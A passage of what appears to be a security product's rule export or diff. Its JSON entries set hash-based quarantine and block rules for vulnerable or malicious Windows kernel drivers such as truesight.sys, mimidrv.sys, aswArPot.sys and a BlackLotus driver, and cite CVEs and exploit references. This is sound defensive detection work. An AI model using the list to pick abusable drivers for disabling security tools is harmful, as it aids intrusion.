"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813504Z", + "creation_date": "2026-03-23T11:45:31.813508Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813516Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0d6993f06763fda1aba7f09487c81c378a6e3d435827d15e778fc499826b205", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac514672-2272-5b59-9695-75b97a22e403", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824162Z", + "creation_date": "2026-03-23T11:45:30.824165Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824172Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce6de057bd961747bf279abe43591823512bfc218b3e378357dc3a6282db5cc6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac5576e5-e8b7-5aea-a541-72fe76d717ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149863Z", + "creation_date": "2026-03-23T11:45:31.149866Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149886Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b240ed7b56af0a9f695504d388a2cc809de65c912d7cfc343b5335cc6aee59a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac62b5e9-2556-562f-9d96-75d2e7832cf3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978188Z", + "creation_date": "2026-03-23T11:45:29.978190Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978196Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "265010deb10af80885726edc450867fa69acbde449b51d13bf891322ff5c1c2d", + "comment": "Malicious Kernel Driver (aka 0x3040_blacklotus_beta_driver.sys) [https://www.loldrivers.io/drivers/8750b245-af35-4bc6-9af3-dc858f9db64f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac67d270-0fb9-527b-87d7-ae97189c7d7c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142754Z", + "creation_date": "2026-03-23T11:45:31.142756Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142762Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "917b94760c0c98d00ad1f3b6955cba990514e5062ec3c9ab0ba77905972d2cfc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac72a93b-ec40-5cb2-bfa8-d25f0cd94075", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975429Z", + "creation_date": "2026-03-23T11:45:29.975431Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975436Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "192a27335de23a008c05efe24ea1fa0f633dd8ddc68d904466e4e2741a0bb645", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac76ff14-b24f-5622-a756-6dfedc236c38", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468259Z", + "creation_date": "2026-03-23T11:45:30.468262Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468271Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "770552bfc6598f165443da94ac0c6aca00f95a6a9a8e89713f9980730d9ee9c2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac7dc6af-2017-52ff-93a4-02537900cb57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144982Z", + "creation_date": "2026-03-23T11:45:31.144984Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144989Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "722ae57db8ce8f7b8cc28714e5c151f812411adbbd27b5e8d5aa75b1f94dd22b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac830ddc-0dfa-54b1-8aa7-93eb3e91b9c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609684Z", + "creation_date": "2026-03-23T11:45:29.609686Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609691Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "2e665962c827ce0adbd29fe6bcf09bbb1d7a7022075d162ff9b65d0af9794ac0", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac889e37-06f3-5744-99e8-e15fee9cf206", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478599Z", + "creation_date": "2026-03-23T11:45:31.478603Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478613Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "33debab1d4d09a0177eb0dccd4764deebbbc19e214385943e257375921e8a323", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac8bd08d-27d9-5298-85a3-f3b6827ad944", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, 
+ "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971857Z", + "creation_date": "2026-03-23T11:45:29.971859Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971865Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac96c034-0647-517a-8d83-9ef765ce5e2c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818541Z", + "creation_date": "2026-03-23T11:45:30.818543Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818549Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53b9e423baf946983d03ce309ec5e006ba18c9956dcd97c68a8b714d18c8ffcf", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ac9ef523-c587-564d-9c65-fd574ce547ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154691Z", + "creation_date": "2026-03-23T11:45:31.154693Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154699Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "619dc10d02ca22d881f02a70f0ad225f736a6f0fc2e1d29eecc275dc3808d7ba", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aca022ec-227a-5f66-83b9-a313a38489c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494112Z", + "creation_date": 
"2026-03-23T11:45:31.494115Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494124Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c55b9674a4dc7a17515ab97db846ce4cbed9e7f9ce2e3e58d860d71b62d3b32a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aca237bd-25fa-5e77-b203-df275f682bb6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970123Z", + "creation_date": "2026-03-23T11:45:29.970125Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970130Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c919efdad21b7d9884903b9d539fbb50dc418ff2c2753c12b35b9ace4c96d73", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"aca6bd2b-253b-5e01-aa5a-498210dc63e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145508Z", + "creation_date": "2026-03-23T11:45:32.145510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145515Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6bc0e1c104fac4a8caa4237c7ae181ca11a043a3ee26426aeb7a90dc40281fad", + "comment": "Vulnerable Kernel Driver (aka szkg64.sys) [https://www.loldrivers.io/drivers/375e8de3-aae4-488d-8273-66744978b45f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "acc33743-5704-544c-b2a2-485eb61c28a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969133Z", + "creation_date": "2026-03-23T11:45:29.969135Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969141Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a42ebde59e8f63804eaa404f79ee93a16bb33d27fb158c6bfbe6143226899a0", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "acc37293-643e-5fe1-bb73-21d55fd3db4e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487218Z", + "creation_date": "2026-03-23T11:45:31.487220Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487225Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c860d22c8a57469b55311b8b6cb3e00eb19b80f94a8da65511faa6a4d1977789", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "acc46334-99cb-5ff2-a332-c8a710273ae3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471455Z", + "creation_date": "2026-03-23T11:45:31.471475Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ce399c685eafd2405f1c89108fdef0086a759426c0d3546759b8ef0de850b5e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "acc554c8-cd52-5981-bae1-8cc535db9036", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456393Z", + "creation_date": "2026-03-23T11:45:30.456397Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456406Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"29cf2d374d7afe009bbf60ba5f50db7016314de682cf3a6f90c0996810c821ef", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "acc71146-1955-5576-b469-e990f3f26a92", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819446Z", + "creation_date": "2026-03-23T11:45:31.819448Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819453Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f580d408a777774f9f5d5079b359e7f1d0acffd35a15bda104f01870d39c0178", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "accb8766-e9e4-5a2c-8149-b48dae1efcb8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141363Z", + "creation_date": "2026-03-23T11:45:31.141365Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141370Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d3cc4151dad39a2cfdc74620401beee39ba77df791962086aabf711c6d06b607", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "acd129e9-99ce-54cc-bab3-fa0adef0827f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827067Z", + "creation_date": "2026-03-23T11:45:31.827069Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827075Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff7ef87064ea5a88eb8eca036025bb081a00d2ab1c24c0cec8ec2fb0f27f0c95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "acd84c09-c1ba-5615-b436-82c5c3ab4e60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490731Z", + "creation_date": "2026-03-23T11:45:31.490733Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490738Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "010a79d3cdb03960969c84bb0316fef86defd97ab61530e34d734b9d1937fd33", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ace12cd4-a45c-5982-889a-b126ba838518", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816617Z", + "creation_date": 
